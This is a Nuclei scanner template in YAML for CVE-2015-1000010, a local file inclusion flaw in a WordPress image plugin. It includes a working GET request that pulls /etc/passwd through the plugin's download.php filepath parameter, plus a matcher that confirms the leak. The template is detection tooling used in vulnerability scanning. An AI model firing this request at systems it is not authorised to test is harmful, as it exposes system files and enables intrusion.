45 lines
1.8 KiB
YAML
45 lines
1.8 KiB
YAML
id: CVE-2015-1000010
|
|
|
|
info:
|
|
name: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion
|
|
author: dhiyaneshDK
|
|
severity: high
|
|
description: |
|
|
WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
|
|
remediation: |
|
|
Update to the latest version of the WordPress Simple Image Manipulator plugin.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
|
|
- https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000010
|
|
- http://www.vapidlabs.com/advisory.php?v=147
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2015-1000010
|
|
cwe-id: CWE-284
|
|
epss-score: 0.03171
|
|
epss-percentile: 0.9002
|
|
cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: simple-image-manipulator_project
|
|
product: simple-image-manipulator
|
|
framework: wordpress
|
|
tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a0048304602210096d5a342aff13d5f040e4c59f11d58a3739bd2dbc2b78c7b4831f69311ae42b1022100f7e91c6316c9c176b73fb01ac91afe828df1459fe59ecfd72db66025b87c3180:922c64590222798bb761d5b6d8e72950 |